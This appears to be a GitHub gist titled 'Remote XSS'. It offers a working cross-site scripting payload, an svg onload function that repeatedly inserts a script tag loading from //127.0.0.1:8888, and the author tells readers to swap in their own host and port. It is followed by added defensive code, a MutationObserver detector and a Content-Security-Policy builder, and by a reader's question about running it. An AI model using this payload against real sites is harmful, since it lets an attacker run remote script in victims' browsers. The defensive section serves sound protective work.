@bl4de
Last active August 23, 2018 15:23
Remote XSS
// clean JavaScript payload
// I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression)
(function(){
    var d=document,s;             // create first <script> element
    s=d.createElement('script');  // and append it to body
    d.body.appendChild(s);
    setInterval(function(){
        d.body.removeChild(s);    // remove, then create again and get connection
        s=d.createElement('script');
        d.body.appendChild(s);
        s.src="//127.0.0.1:8888";
        d.body.appendChild(s);
    },0);
})()
<svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>
@bl4de
Author

bl4de commented Feb 25, 2016

Complete XSS payload:

 <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
 setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
 s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>

You need to change the s.src IP (or hostname) and TCP port to something that works for you.

// clean JavaScript payload
// I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression)
(function(){
    var d=document,s;             // create first <script> element
    s=d.createElement('script');  // and append it to body
    d.body.appendChild(s);
    setInterval(function(){
        d.body.removeChild(s);    // remove, then create again and get connection
        s=d.createElement('script');
        d.body.appendChild(s);
        s.src="//127.0.0.1:8888";
        d.body.appendChild(s);
    },0);
})()

Element:

<script src="//127.0.0.1:8888"></script>

is created only once in the whole DOM.

The browser works a little bit slower, but there's no new script element appended in every setInterval() iteration.
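
Defender's view of the payload above, as an added example that is not part of bl4de's gist: the behaviour worth detecting is a <script> element being inserted into the DOM with a src that resolves to an origin the page never intended to load from (the protocol-relative "//127.0.0.1:8888" here), from a handler that fires again on every setInterval() tick. The classifier below only needs an object with tagName and src, so it can be exercised outside a browser; the MutationObserver wrapper installs it in a real page; the CSP builder produces the header that stops both halves of the payload (the inline svg onload handler and the external script fetch). The allowlist cdn.example.com, the page origin app.example and the console report sink are constructed values for this example, not anything from the gist.

```javascript
// Added example (not from bl4de's gist): detect and block dynamically inserted
// <script> elements whose src points outside the page's known script origins.
//
// Constructed allowlist of origins this page legitimately loads scripts from.
const ALLOWED_SCRIPT_ORIGINS = ['https://cdn.example.com'];

// Resolve a src attribute the way the browser would. A protocol-relative value
// such as "//127.0.0.1:8888" takes the page's scheme, so its origin is external.
// Returns null for an inline script (no src) and 'invalid' for unparsable input.
function scriptOrigin(src, pageOrigin) {
  if (!src) return null;
  try {
    return new URL(src, pageOrigin).origin;
  } catch (e) {
    return 'invalid';
  }
}

// Classify an inserted node. `node` only needs { tagName, src }, which is what a
// real HTMLScriptElement exposes, so the same function runs in tests and in the
// observer callback.
function classifyScript(node, pageOrigin, allowed = ALLOWED_SCRIPT_ORIGINS) {
  if (!node || String(node.tagName).toUpperCase() !== 'SCRIPT') return 'not-script';
  const origin = scriptOrigin(node.src, pageOrigin);
  if (origin === null) return 'inline';
  if (origin === pageOrigin || allowed.includes(origin)) return 'allowed';
  return 'unexpected-external';
}

// Browser side: the payload re-creates and re-appends the element from a
// setInterval, so a subtree childList observer sees every insertion. External
// scripts from unknown origins are removed; inline inserts are only reported,
// because many legitimate pages insert inline scripts themselves.
function installScriptMonitor(report = console.warn) {
  if (typeof MutationObserver === 'undefined' || typeof document === 'undefined') {
    return null; // not running in a browser
  }
  const observer = new MutationObserver((records) => {
    for (const record of records) {
      for (const node of record.addedNodes) {
        const verdict = classifyScript(node, location.origin);
        if (verdict === 'unexpected-external') {
          report(`blocked script insert: ${node.src}`);
          node.remove(); // best effort; a CSP is the control that actually prevents the fetch
        } else if (verdict === 'inline') {
          report('inline script inserted');
        }
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}

// The response header that prevents the payload outright: without
// 'unsafe-inline' the svg onload handler never executes, and a script-src
// limited to known origins means //127.0.0.1:8888 is never requested.
function cspForScripts(allowed = ALLOWED_SCRIPT_ORIGINS) {
  return `script-src 'self' ${allowed.join(' ')}; object-src 'none'; base-uri 'self'`;
}

// Stand-alone run: classify a constructed node shaped like the gist's element.
if (typeof document === 'undefined') {
  const verdict = classifyScript({ tagName: 'script', src: '//127.0.0.1:8888' }, 'https://app.example');
  console.log(verdict, '|', cspForScripts());
}
```

The observer is telemetry, not a fix: by the time the callback runs the element is already in the DOM and the request may have been issued. The Content-Security-Policy header is what removes the capability, and the page's own HTML-encoding of user input is what keeps the svg tag from being rendered in the first place.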

@elagrija

Hi. I have one query on the IIFE way of running remote-XSS-javascript-part.js.

  1. How can I run this code? I tried to run the code independently and got an error that document is undefined.
    Can you help me to run the code?
